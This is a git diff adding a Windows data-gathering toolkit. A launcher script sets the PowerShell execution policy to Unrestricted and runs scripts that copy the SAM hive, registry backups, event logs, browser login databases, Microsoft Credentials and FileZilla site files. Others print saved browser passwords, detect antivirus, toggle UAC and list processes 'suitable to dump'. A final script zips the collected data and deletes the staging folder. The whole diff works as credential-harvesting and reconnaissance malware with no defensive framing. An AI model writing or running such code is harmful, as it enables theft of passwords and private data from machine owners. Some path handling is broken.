diff --git a/CODE/Antivirus_Finder.ps1 b/CODE/Antivirus_Finder.ps1 new file mode 100644 index 0000000..d016278 --- /dev/null +++ b/CODE/Antivirus_Finder.ps1 @@ -0,0 +1,42 @@ +# Define the list of antivirus names to search for +$antivirusNames = @("Norton", "McAfee", "Avast", "AVG", "Bitdefender", "Kaspersky", "ESET", "Sophos", "TrendMicro", "Comodo", "Panda", "Avira", "F-Secure", "GData", "Malwarebytes", "Spybot", "ZoneAlarm", "Webroot") + +# Check if the 'tree' command is available +if (-not (Get-Command tree -ErrorAction SilentlyContinue)) { + Write-Host "tree command not found. Please install or use an alternative method." + exit +} + +# Run the tree command and capture its output +$treeOutput = tree /f + +# Split the output into lines +$lines = $treeOutput -split "`n" + +# Remove duplicates from the antivirus names list +$antivirusNames = $antivirusNames | Sort-Object | Get-Unique + +# Initialize variables for progress tracking +$completedLines = 0 +$foundAntivirus = @() + +# Process each line +foreach ($line in $lines) { + $completedLines++ + + # Check for antivirus names in the line, ensuring it's a complete word + foreach ($name in $antivirusNames) { + if ($line -match "\b$name\b") { + $foundAntivirus += $name + } + } +} + +# Print the total lines processed and what was found to the console +Write-Host "Processed $completedLines lines." +if ($foundAntivirus.Count -gt 0) { + Write-Host "Found Antivirus:" + $foundAntivirus | Sort-Object -Unique | ForEach-Object { Write-Host $_ } +} else { + Write-Host "No antivirus found." +} diff --git a/CODE/Browser_And_Policies_Miner.ps1 b/CODE/Browser_And_Policies_Miner.ps1 new file mode 100644 index 0000000..b001a63 --- /dev/null +++ b/CODE/Browser_And_Policies_Miner.ps1 @@ -0,0 +1,59 @@ +# Define the list of source paths with placeholders +$sourcePaths = @( + "C:\Users\{}\AppData\Local\Microsoft\Edge\User Data\Default\Network", + "C:\Users\{}\AppData\Local\Google\Chrome\User Data\Default\Network", + "C:\Users\{}\AppData\Roaming\Mozilla\Firefox\Profiles", + "C:\Users\{}\AppData\Roaming\Opera Software\Opera Stable\Network", + "C:\Users\{}\AppData\Roaming\Opera Software\Opera GX Stable\Network", + 'C:\\WINDOWS\\system32\\config\\SAM', + 'C:\\Windows\\System32\\config', + 'C:\\Windows\\System32\\GroupPolicy', + 'C:\\Windows\\System32\\GroupPolicyUsers', + 'C:\\Windows\\System32\\winevt\\Logs' +) + +# Define the list of identifiers for renaming +$identifiers = @( + "Edge", + "Chrome", + "Firefox", + "OperaStable", + "OperaGXStable", + "SAM", + "SystemConfig", + "GroupPolicy", + "GroupPolicyUsers", + "WindowsEventLogs" +) + +# Get the current user's name +$currentUser = $env:USERNAME + +# Define the base directory for the destination +$baseDirectory = "DATA" + +# Loop through each source path +for ($i = 0; $i -lt $sourcePaths.Count; $i++) { + # Replace the placeholder with the current user's name + $sourcePath = $sourcePaths[$i] -replace '\{\}', $currentUser + $identifier = $identifiers[$i] + + # Define the destination path + $destinationPath = Join-Path -Path $baseDirectory -ChildPath "USER_$identifier" + + # Check if the source path exists + if (Test-Path $sourcePath) { + # Attempt to copy the folder to the DATA directory and rename it + try { + Copy-Item -Path $sourcePath -Destination $destinationPath -Recurse -Force + # Print the message to the console + Write-Host "Copied $sourcePath to $destinationPath" + } catch { + # Print the error message to the console + Write-Host "Failed to copy $sourcePath to $destinationPath. Error: $_" + } + } else { + # Print the message to the console + Write-Host "Source path $sourcePath does not exist." + } +} diff --git a/CODE/Copy_Media.py b/CODE/Copy_Media.py new file mode 100644 index 0000000..eabce46 --- /dev/null +++ b/CODE/Copy_Media.py @@ -0,0 +1,52 @@ +import os +import shutil +from tqdm import tqdm + + +def estimate_folder_size(folder_path): + """Estimate the size of a folder.""" + total_size = 0 + for dirpath, dirnames, filenames in os.walk(str(folder_path)): + for f in filenames: + fp = os.path.join(str(dirpath), f) + total_size += os.path.getsize(fp) + return total_size + + +def copy_folders(source_paths, destination_path): + """Copy folders to a specified destination with a progress bar.""" + for source_path in tqdm(source_paths, desc="Copying folders"): + shutil.copytree(str(source_path), os.path.join(str(destination_path), os.path.basename(str(source_path)))) + + +def main(): + # Get the current user's username + username = os.getlogin() + + # Define the source folders using the current user's username + source_folders = [ + f"C:/Users/{username}/Music", + f"C:/Users/{username}/Pictures", + f"C:/Users/{username}/Videos" + ] + + # Get the script's directory + script_dir = os.path.dirname(os.path.realpath(__file__)) + # Define the destination folder as a DATA folder within the script's directory + destination_folder = os.path.join(script_dir, "DATA") + + # Create the DATA folder if it doesn't exist + if not os.path.exists(destination_folder): + os.makedirs(destination_folder) + + # Estimate the sizes of the source folders + estimated_sizes = {} + for folder in source_folders: + if os.path.exists(folder): + estimated_sizes[folder] = estimate_folder_size(folder) + else: + print(f"ERROR: Folder not found: {folder}") + + # Proceed with copying the folders without user confirmation + copy_folders(source_folders, destination_folder) + print("INFO: Folders copied successfully.") diff --git a/CODE/Copy_System_Files.py b/CODE/Copy_System_Files.py new file mode 100644 index 0000000..cceaecb --- /dev/null +++ b/CODE/Copy_System_Files.py @@ -0,0 +1,128 @@ +import getpass +import os +import shutil +import subprocess + + +USER_NAME = getpass.getuser() +DESTINATION_PREFIX = "DATA\\" + USER_NAME + +paths_and_name = [ + "%windir%\\repair\\sam", "SAM Backup", + "%windir%\\System32\\config\\RegBack\\SAM", "SAM Registry Backup", + "%windir%\\repair\\system", "System Backup", + "%windir%\\repair\\software", "Software Backup", + "%windir%\\repair\\security", "Security Backup", + "%windir%\\debug\\NetSetup.log", "NetSetup Debug Log", + "%windir%\\iis6.log", "IIS 6 Log", + "%windir%\\system32\\logfiles\\httperr\\httperr1.log", "HTTP Error Log", + "C:\\sysprep.inf", "Sysprep Configuration File", + "C:\\sysprep\\sysprep.inf", "Sysprep Configuration File (Alternate)", + "C:\\sysprep\\sysprep.xml", "Sysprep XML Configuration", + "%windir%\\Panther\\Unattended.xml", "Unattended Windows Setup XML", + "C:\\inetpub\\wwwroot\\Web.config", "IIS Web Configuration", + "%windir%\\system32\\config\\AppEvent.Evt", "Application Event Log", + "%windir%\\system32\\config\\SecEvent.Evt", "Security Event Log", + "%windir%\\system32\\config\\default.sav", "Default Registry Backup", + "%windir%\\system32\\config\\security.sav", "Security Registry Backup", + "%windir%\\system32\\config\\software.sav", "Software Registry Backup", + "%windir%\\system32\\config\\system.sav", "System Registry Backup", + "%windir%\\system32\\inetsrv\\config\\applicationHost.config", "IIS Application Host Configuration", + "%windir%\\system32\\inetsrv\\config\\schema\\ASPNET_schema.xml", "ASP.NET Schema XML", + "%windir%\\System32\\drivers\\etc\\hosts", "Hosts File", + "%windir%\\System32\\drivers\\etc\\networks", "Networks File", + "C:\\inetpub\\logs\\LogFiles", "IIS Log Files", + "C:\\inetpub\\wwwroot", "IIS Web Root", + "C:\\inetpub\\wwwroot\\default.htm", "Default IIS Web Page", + "C:\\laragon\\bin\\php\\php.ini", "Laragon PHP Configuration", + "C:\\php\\php.ini", "PHP Configuration", + f"C:\\Users\\{DESTINATION_PREFIX}\\AppData\\Local\\FileZilla", "FileZilla Local Data", + f"C:\\Users\\{DESTINATION_PREFIX}\\AppData\\Local\\FileZilla\\cache.xml", "FileZilla Cache XML", + f"C:\\Users\\{DESTINATION_PREFIX}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", + "Google Chrome Login Data", + f"C:\\Users\\{DESTINATION_PREFIX}\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat", "Windows User Class Data", + f"C:\\Users\\{DESTINATION_PREFIX}\\AppData\\Local\\Programs\\Microsoft VS Code\\updater.log", "VS Code Updater Log", + f"C:\\Users\\{DESTINATION_PREFIX}\\AppData\\Roaming\\Code\\User\\settings.json", "VS Code User Settings", + f"C:\\Users\\{DESTINATION_PREFIX}\\AppData\\Roaming\\Code\\User\\workspaceStorage", "VS Code Workspace Storage", + f"C:\\Users\\{DESTINATION_PREFIX}\\AppData\\Roaming\\FileZilla\\filezilla-server.xml", + "FileZilla Server Configuration", + f"C:\\Users\\{DESTINATION_PREFIX}\\AppData\\Roaming\\FileZilla\\filezilla.xml", "FileZilla Client Configuration", + f"C:\\Users\\{DESTINATION_PREFIX}\\AppData\\Roaming\\FileZilla\\logs", "FileZilla Logs", + f"C:\\Users\\{DESTINATION_PREFIX}\\AppData\\Roaming\\FileZilla\\recentservers.xml", "FileZilla Recent Servers", + f"C:\\Users\\{DESTINATION_PREFIX}\\AppData\\Roaming\\FileZilla\\sitemanager.xml", "FileZilla Site Manager", + f"C:\\Users\\{DESTINATION_PREFIX}\\AppData\\Roaming\\Microsoft\\Credentials", "Microsoft Credentials", + "C:\\Users\\{username}\\AppData\\Roaming\\Microsoft\\Outlook", "Outlook User Data", + "C:\\Users\\{DESTINATION_PREFIX}\\NTUSER.DAT", "NT User Profile", + "C:\\wamp\\bin\\php\\php.ini", "WAMP PHP Configuration", + "C:\\Windows\\php.ini", "Windows PHP Configuration", + "C:\\Windows\\System32\\config\\NTUSER.DAT", "NT User Profile (System)", + "C:\\Windows\\System32\\drivers\\etc\\hosts", "Hosts File (System)", + "C:\\Windows\\System32\\inetsrv\\config\\administration.config", "IIS Administration Configuration", + "C:\\Windows\\System32\\inetsrv\\config\\applicationHost.config", "IIS Application Host Configuration (System)", + "C:\\Windows\\System32\\inetsrv\\config\\applicationHost.hist", "IIS Application Host History", + "C:\\Windows\\System32\\inetsrv\\config\\monitoring\\global.xml", "IIS Monitoring Configuration", + "C:\\Windows\\System32\\inetsrv\\config\\redirection.config", "IIS Redirection Configuration", + "C:\\Windows\\System32\\inetsrv\\config\\schema\\applicationHost.xsd", "IIS Application Host Schema", + "C:\\Windows\\System32\\inetsrv\\config\\schema\\ASPNET_schema.xml", "ASP.NET Schema XML (System)", + "C:\\Windows\\System32\\inetsrv\\config\\schema\\dotnetconfig.xsd", ".NET Configuration Schema", + "C:\\Windows\\System32\\inetsrv\\config\\schema\\IISProvider_schema.xml", "IIS Provider Schema", + "C:\\Windows\\System32\\inetsrv\\config\\schema\\IIS_schema.xml", "IIS Schema", + "C:\\Windows\\System32\\inetsrv\\config\\schema\\rewrite_schema.xml", "Rewrite Schema", + "C:\\Windows\\System32\\LogFiles\\W3SVC1", "IIS Log Files (W3SVC1)", + "C:\\Windows\\system.ini", "System Configuration", + "C:\\xampp\\apache\\conf\\extra\\httpd-ssl.conf", "Apache SSL Configuration", + "C:\\xampp\\apache\\conf\\extra\\httpd-vhosts.conf", "Apache Virtual Hosts Configuration", + "C:\\xampp\\apache\\conf\\httpd.conf", "Apache HTTP Server Configuration", + "C:\\xampp\\apache\\logs\\access.log", "Apache Access Log", + "C:\\xampp\\apache\\logs\\php_error_log", "Apache PHP Error Log", + "C:\\xampp\\phpMyAdmin\\config.inc.php", "phpMyAdmin Configuration", + "C:\\xampp\\php\\php.ini", "XAMPP PHP Configuration", + "C:\\xampp\\xampp-control.log", "XAMPP Control Log" +] + + +def copy_and_rename_files(paths_and_name): + for file_path, file_name in zip(paths_and_name[::2], paths_and_name[1::2]): + try: + file_path = os.path.expandvars(file_path) + if not os.path.exists(file_path): + print(f"The file {file_path} does not exist.") + print() + continue + + shutil.copy2(file_path, os.getcwd()) + new_file_name = f"{USER_NAME}_{file_name}" + new_file_path = os.path.join(os.getcwd(), new_file_name) + if os.path.exists(new_file_path): + os.remove(new_file_path) # Delete the existing file + os.rename(os.path.join(os.getcwd(), os.path.basename(file_path)), new_file_path) + print(f"INFO: Copied and renamed file to {new_file_name}") + print() + except FileNotFoundError: + print(f"ERROR: The file at path {file_path} was not found.") + print() + except Exception as e: + print(f"ERROR: An error occurred: {e}") + print() + + +def execute_tree_batch_file(): + # Define the name of the batch file + batch_file_name = "Tree_Command.bat" + + # Check if the batch file exists in the current working directory + if os.path.exists(batch_file_name): + # Construct the command to run the batch file + command = [batch_file_name] + + # Run the batch file and wait for it to finish + subprocess.run(command, check=True) + print(f"INFO: {batch_file_name} has been executed successfully.") + print() + else: + print(f"ERROR: {batch_file_name} not found in the current working directory.") + print() + + +execute_tree_batch_file() +copy_and_rename_files(paths_and_name) diff --git a/CODE/Simple_Password_Miner.py b/CODE/Simple_Password_Miner.py new file mode 100644 index 0000000..88962ca --- /dev/null +++ b/CODE/Simple_Password_Miner.py @@ -0,0 +1,138 @@ +import os +import sqlite3 +import winreg +import shutil + + +def copy_file(src_path, dest_dir): + """ + Copies a file to a specified directory. + + :param src_path: The path of the source file. + :param dest_dir: The path of the destination directory. + """ + try: + src_path = str(src_path) # Ensure src_path is a string + dest_dir = str(dest_dir) # Ensure dest_dir is a string + if not os.path.exists(dest_dir): + os.makedirs(dest_dir) + dest_path = os.path.join(dest_dir, os.path.basename(src_path)) + shutil.copy2(src_path, dest_path) + print(f"INFO: Copied file to: {dest_path}") + except Exception as e: + print(f"ERROR: {e}") + + +def search_filesystem(): + print("INFO: Searching the file system for passwords...") + extensions = ['*.xml', '*.ini', '*.txt'] + for ext in extensions: + for line in os.popen(f'findstr /si password {ext}'): + # Split the line by ':' to separate the file path from the matched line + parts = line.strip().split(':', 1) + if len(parts) > 1: + file_path = parts[0].strip() # The first part is the file path + print(f"INFO: Found password in file: {file_path}") + copy_file(file_path, "DATA/found_passwords") + + +def search_desktop(): + print("INFO: Searching the desktop for password files...") + desktop_path = os.path.join(os.path.expanduser("~"), "Desktop") + for file in os.listdir(desktop_path): + if "password" in file.lower(): + file_path = os.path.join(desktop_path, file) + print(f"INFO: Found password file on desktop: {file_path}") + copy_file(file_path, "DATA/found_passwords") + + +def search_registry(): + print("INFO: Searching the registry for passwords...") + try: + key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon") + i = 0 + while True: + try: + value = winreg.EnumValue(key, i) + if "password" in value[0].lower(): + print(f"INFO: Found password in registry: {value[0]} = {value[1]}") + i += 1 + except OSError: + break + except OSError: + print("WARNING: Registry search failed.") + + +def search_google(): + print("INFO: Searching for stored passwords in browsers...") + # Define the path to the Chrome Login Data file + chrome_login_data_path = os.path.join(os.path.expanduser("~"), "AppData", "Local", "Google", "Chrome", "User Data", + "Default", "Login Data") + + # Check if the file exists + if not os.path.exists(chrome_login_data_path): + print( + "WARNING: Chrome Login Data file not found. Is Chrome installed and the 'Encrypt passwords' feature disabled?") + return + + # Connect to the SQLite database + try: + conn = sqlite3.connect(chrome_login_data_path) + cursor = conn.cursor() + + # Execute a query to retrieve all stored passwords + cursor.execute("SELECT action_url, username_value, password_value FROM logins") + results = cursor.fetchall() + + if results: + for result in results: + print( + f"INFO: Found password in Chrome: URL = {result[0]}, Username = {result[1]}, Password = {result[2]}") + else: + print("WARNING: No passwords found in Chrome.") + + # Close the database connection + conn.close() + except sqlite3.Error as e: + print(f"ERROR: Error accessing Chrome Login Data: {e}") + + +def search_opera(): + print("INFO: Searching for stored passwords in Opera...") + opera_login_data_path = os.path.join(os.path.expanduser("~"), "AppData", "Roaming", "Opera Software", + "Opera Stable", "Login Data") + + if not os.path.exists(opera_login_data_path): + print( + "WARNING: Opera Login Data file not found. Is Opera installed and the 'Encrypt passwords' feature disabled?") + return + + try: + conn = sqlite3.connect(opera_login_data_path) + cursor = conn.cursor() + + cursor.execute("SELECT action_url, username_value, password_value FROM logins") + results = cursor.fetchall() + + if results: + for result in results: + print( + f"INFO: Found password in Opera: URL = {result[0]}, Username = {result[1]}, Password = {result[2]}") + else: + print("WARNING: No passwords found in Opera.") + + conn.close() + except sqlite3.Error as e: + print(f"ERROR: Error accessing Opera Login Data: {e}") + + +def main(): + search_registry() + search_filesystem() + search_desktop() + search_google() + search_opera() + + +if __name__ == "__main__": + main() diff --git a/CODE/System_Info_Grabber.py b/CODE/System_Info_Grabber.py new file mode 100644 index 0000000..6252b5f --- /dev/null +++ b/CODE/System_Info_Grabber.py @@ -0,0 +1,127 @@ +import getpass +import socket +import subprocess +import re +import uuid +import psutil +import wmi + +USER_NAME = getpass.getuser() +DESTINATION_PREFIX = "DATA\\" + USER_NAME + + +def filter_processes(): + # Define the process names to filter + system_processes = ['System', 'smss.exe', 'wininit.exe', 'services.exe', 'csrss.exe'] + network_processes = ['svchost.exe', 'wininit.exe', 'netsh.exe', 'net.exe'] + web_browser_processes = ['chrome.exe', 'firefox.exe', 'iexplore.exe', 'msedge.exe'] + email_clients = ['outlook.exe', 'thunderbird.exe', 'microsoft-windows-live-mail.exe'] + office_processes = ['excel.exe', 'word.exe', 'powerpoint.exe', 'outlook.exe'] + antivirus_security_processes = ['msmpeng.exe'] + + # Get a list of all running processes + processes = [] + for process in psutil.process_iter(['pid', 'name']): + try: + # Use as_dict() to get a dictionary representation of the process + pinfo = process.as_dict(attrs=['pid', 'name']) + processes.append(pinfo) + except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess): + pass + + # Filter and print the list of processes + for p in processes: + if (p['name'] in system_processes or p['name'] in network_processes + or p['name'] in web_browser_processes or p['name'] in email_clients or p['name'] in office_processes or + p[ + 'name'] in antivirus_security_processes): + print(f"INFO: PID = {p['pid']}, Program Name = {p['name']}") + print() + + +def extract_version_number(output): + # Adjusted regular expression pattern to match version numbers with multiple dots, + # This pattern looks for sequences of digits separated by dots, ensuring there are at least two dots + pattern = r'\b\d+(\.\d+){2,}\b' + + # Search for the first match of the pattern in the output + match = re.search(pattern, output) + + # If a match is found, return the matched string (the version number) + # Otherwise, return None + return match.group(0) if match else None + + +def get_windows_version_info(): + # Command to get Windows version and type + command = 'wmic os get Caption, Version' + + # Execute the command and capture the output + result = subprocess.run(command, stdout=subprocess.PIPE, text=True, shell=True) + + # Extract the version number using the extract_version_number function + version_number = extract_version_number(result.stdout) + + # Extract the type using regular expressions + type_match = re.search(r'(\bHome\b|\bEnterprise\b)', result.stdout, re.IGNORECASE) + type = type_match.group(1) if type_match else None + + # Return the version number and type + return version_number, type + + +def get_network_info(): + # Get the hostname + hostname = socket.gethostname() + + # Get the IPv4 address + ipv4 = socket.gethostbyname(hostname) + + # Get the IPv6 address + ipv6 = [item[4][0] for item in socket.getaddrinfo(hostname, None, socket.AF_INET6)] + + # Get the MAC address + # This is a workaround as Python does not provide a direct way to get the MAC address + # We use the UUID to generate a unique identifier for the network interface + mac_address = ':'.join(['{:02x}'.format((uuid.getnode() >> i) & 0xff) for i in range(0, 8 * 6, 8)][::-1]) + + return ipv4, ipv6, mac_address + + +def get_computer_model(): + c = wmi.WMI() + for system in c.Win32_ComputerSystem(): + return system.Model + + +def execute_command(command): + process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True) + stdout, stderr = process.communicate() + return stdout + + +ipv4, ipv6, mac_address = get_network_info() +version_number, type = get_windows_version_info() + +print(f"INFO: Raw Processes Running Suitable to dump:- {filter_processes()}") +print() +print(f"INFO: Computer Model: {get_computer_model()}") +print() +print("INFO: CPU", execute_command('wmic cpu get Name').splitlines()[2].strip()) +print() +print("INFO: GPU", execute_command('wmic path win32_VideoController get Name').splitlines()[2].strip()) +print() +print("INFO: RAM", execute_command('wmic MEMORYCHIP get BankLabel, Capacity, MemoryType').splitlines()[2].strip()) +print() +print("INFO: SSD", execute_command('wmic diskdrive get Model, MediaType, Size').splitlines()[2].strip()) +print() +print(f"INFO: Windows Version Number: {version_number}") +print() +print(f"INFO: Windows Type: {type}") +print() +print(f"INFO: IPv4: {ipv4}") +print() +print(f"INFO: IPv6: {ipv6}") +print() +print(f"INFO: MAC Address: {mac_address}") +print() diff --git a/CODE/Tree_Command.bat b/CODE/Tree_Command.bat new file mode 100644 index 0000000..71aae74 --- /dev/null +++ b/CODE/Tree_Command.bat @@ -0,0 +1,11 @@ +@echo off +setlocal + +:: Get the current user's name +for /f "tokens=*" %%i in ('echo %username%') do set userName=%%i + +:: Define the output file name based on the current user's name +set outputFile=%userName%_tree.txt + +:: Run the tree command and redirect the output to the file +powershell.exe -Command "& {tree C:\ | Out-File -FilePath %outputFile%}" diff --git a/CODE/UAC.ps1 b/CODE/UAC.ps1 new file mode 100644 index 0000000..c03f4d8 --- /dev/null +++ b/CODE/UAC.ps1 @@ -0,0 +1,26 @@ +# Define the path to the UAC settings in the registry +$UACPath = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" + +# Check the current UAC setting +$UACStatus = Get-ItemProperty -Path $UACPath -Name "EnableLUA" -ErrorAction SilentlyContinue + +if ($null -eq $UACStatus) { + Write-Host "ERROR: UAC status could not be determined. Please ensure the script is run with administrative privileges." +} elseif ($UACStatus.EnableLUA -eq 1) { + # UAC is on, disable it + Set-ItemProperty -Path $UACPath -Name "EnableLUA" -Value 0 + Write-Host "INFO: UAC has been disabled. Would you like to restart the computer now? (Y/N)" +} else { + # UAC is off, enable it + Set-ItemProperty -Path $UACPath -Name "EnableLUA" -Value 1 + Write-Host "INFO: UAC has been enabled. Would you like to restart the computer now? (Y/N)" +} + +$confirmation = Read-Host + +if ($confirmation -eq "Y" -or $confirmation -eq "y") { + Write-Host "INFO: Restarting the computer..." + Restart-Computer -Force +} else { + Write-Host "INFO: Restart canceled by user." +} diff --git a/CODE/UACPY.py b/CODE/UACPY.py new file mode 100644 index 0000000..cab02e8 --- /dev/null +++ b/CODE/UACPY.py @@ -0,0 +1,42 @@ +import subprocess + + +def get_uac_setting(): + # Query the current UAC setting using PowerShell + uac_setting = subprocess.run(["powershell", "-Command", + "Get-ItemProperty -Path 'HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System' -Name 'EnableLUA'"], + capture_output=True, text=True, check=True) + # Extract the value + value = uac_setting.stdout.strip() + return value + + +def set_uac_setting(value): + # Set the UAC setting using PowerShell + subprocess.run(["powershell", "-Command", + "Set-ItemProperty -Path 'HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System' -Name 'EnableLUA' -Value " + value], + check=True) + + +def main(): + print("INFO: Script started executing.") + # Get the current UAC setting + old_uac_setting = get_uac_setting() + print(f"INFO: Old UAC setting: {old_uac_setting}") + + # Change the UAC setting to the opposite value + new_uac_setting = '0' if old_uac_setting == '1' else '1' + set_uac_setting(new_uac_setting) + print(f"INFO: New UAC setting: {new_uac_setting}") + + # Ask the user to restart their computer + print("INFO: Please restart your computer for the changes to take effect.") + # Prompt the user to restart with confirmation + user_input = input("Do you want to restart your computer now? (yes/no): ") + if user_input.lower() == 'yes': + subprocess.run(["powershell", "-Command", "shutdown /r /t 0"], check=True) + else: + print("INFO: Restart cancelled by the user.") + + +main() diff --git a/CODE/Voyager.py b/CODE/Voyager.py new file mode 100644 index 0000000..b38e9ca --- /dev/null +++ b/CODE/Voyager.py @@ -0,0 +1,64 @@ +import ctypes +import os +import platform +import subprocess + + +def execute_code(script_path): + if os.path.splitext(script_path)[1].lower() == '.ps1': + unblock_command = f'powershell.exe -Command "Unblock-File -Path {script_path}"' + subprocess.run(unblock_command, shell=True, check=True) + print("INFO: Script unblocked.") + print() + + command = f'powershell.exe -Command "& {script_path}"' + process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + stdout, stderr = process.communicate() + + # Decode the output from bytes to string + stdout = stdout.decode('utf-8') + stderr = stderr.decode('utf-8') + + # Return the output and error messages + return stdout, stderr + + +def set_execution_policy(): + command = "powershell.exe Set-ExecutionPolicy Unrestricted -Scope CurrentUser -Force" + try: + subprocess.run(command, shell=True, check=True) + print("INFO: Execution policy has been set to Unrestricted.") + print() + except subprocess.CalledProcessError as e: + print(f"WARNING: Failed to set execution policy to Unrestricted. Error: {e}") + print() + + +def checks(): + def is_admin(): + try: + return ctypes.windll.shell32.IsUserAnAdmin() + except: + return False + + if platform.system() == 'Windows': + if is_admin(): + print("SYSTEM: code.py is running with administrative privileges.") + else: + print("WARNING: code.py is running without administrative privileges.") + print("WARNING: This may cause errors") + else: + print("This script is intended to run on Windows.") + + +def main(): + set_execution_policy() + checks() + for script_path in ["./Copy_System_Files.py", "./Browser_And_Policies_Miner.ps1", "./Window_Features_Lister.bat", + "./Antivirus_Finder.ps1", "./Simple_Password_Miner.py", "./Copy_Media.py", + "./System_Info_Grabber.py", "./Zipper.py"]: + execute_code(script_path) + + +if __name__ == "__main__": + main() diff --git a/CODE/Window_Features_Lister.bat b/CODE/Window_Features_Lister.bat new file mode 100644 index 0000000..7cc3e04 --- /dev/null +++ b/CODE/Window_Features_Lister.bat @@ -0,0 +1,18 @@ +@echo off +echo INFO: Listing all enabled Windows features: +echo. + +:: Get the current user's name +set USERNAME=%USERNAME% + +:: Check if the DATA folder exists, if not, create it +if not exist DATA mkdir DATA + +:: Create a new text file named after the user with the output of the command inside the DATA folder +dism /online /get-features /format:table > DATA\%USERNAME%_WinFeatures.txt + +:: Print the output of the command to the console +echo INFO: The list of enabled Windows features has been saved to DATA\%USERNAME%_WinFeatures.txt + +:: Print a message to the console indicating the command output has been logged +echo INFO: Command output has been logged to DATA\%USERNAME%_WinFeatures.txt diff --git a/CODE/Zipper.py b/CODE/Zipper.py new file mode 100644 index 0000000..1007599 --- /dev/null +++ b/CODE/Zipper.py @@ -0,0 +1,128 @@ +from datetime import datetime +import getpass +import os +import shutil +import time +import zipfile + +USER_NAME = getpass.getuser() +DESTINATION_PREFIX = "DATA\\" + USER_NAME + + +def zip_data_folder(): + # Define the source folder and the destination zip file + source_folder = "DATA" + destination_zip = f"{USER_NAME}_data.zip" + + # Check if the source folder exists + if not os.path.exists(source_folder): + print(f"ERROR: The folder {source_folder} does not exist.") + print() + return + + # Create a ZipFile object + with zipfile.ZipFile(destination_zip, 'w', zipfile.ZIP_DEFLATED) as zipf: + # Iterate over all the files in the source folder + for root, dirs, files in os.walk(source_folder): + for file in files: + # Construct the full file path + file_path = os.path.join(root, file) + # Add the file to the zip + zipf.write(file_path, os.path.relpath(file_path, source_folder)) + + print(f"INFO: Folder {source_folder} has been zipped into {destination_zip}.") + print() + + +def process_files(): + # Define the current working directory and the DATA directory + current_dir = os.getcwd() + data_dir = os.path.join(current_dir, 'DATA') + + # Ensure the DATA directory exists, if not, create it + if not os.path.exists(data_dir): + os.makedirs(data_dir) + + # List all items in the current directory + items = os.listdir(current_dir) + + # Filter items that are files with.txt,.file extensions or no extension + target_files = [item for item in items if + item.endswith('.txt') or item.endswith('.file') or not os.path.splitext(item)[1]] + + if target_files: + print(f"INFO: Found {len(target_files)} files to process.") + print() + for item in target_files: + # Construct the full path to the item + item_path = os.path.join(current_dir, item) + + # Check if the item is a file before attempting to copy + if os.path.isfile(item_path): + # Copy the file to the DATA directory + shutil.copy(item_path, data_dir) + + # Delete the original file + os.remove(item_path) + + print(f"INFO: Processed {item}, copied to {data_dir} and deleted.") + print() + else: + print(f"INFO: Skipping {item} as it is not a file (it might be a directory).") + print() + else: + print("WARNING: No.txt,.file files or files without extensions found in the current directory.") + print() + + +def empty_data_folder(): + # Get the current working directory + current_dir = os.getcwd() + + # Define the folder name to search for + folder_name = "DATA" + + # Construct the path to the folder + folder_path = os.path.join(current_dir, folder_name) + + # Check if the folder exists + if os.path.exists(folder_path): + # Check if the folder is a directory + if os.path.isdir(folder_path): + # List all files and directories in the folder + for item in os.listdir(folder_path): + # Construct the full path to the item + item_path = os.path.join(folder_path, item) + + # Check if the item is a file or directory + if os.path.isfile(item_path): + # Remove the file + os.remove(item_path) + elif os.path.isdir(item_path): + # Remove the directory and its contents + shutil.rmtree(item_path) + + else: + print(f"ERROR: The folder '{folder_name}' does not exist in the current working directory.") + + +def get_current_datetime(): + # Get the current date and time + now = datetime.now() + + # Format the date and time + formatted_now = now.strftime("%Y-%m-%d %H:%M:%S") + + return formatted_now + + +process_files() +time.sleep(6) +zip_data_folder() +print("INFO: Finished, Closing in 3 seconds...") +print() +time.sleep(6) +empty_data_folder() +current_datetime = get_current_datetime() +print("SYSTEM: Project Complete: ", current_datetime) +print()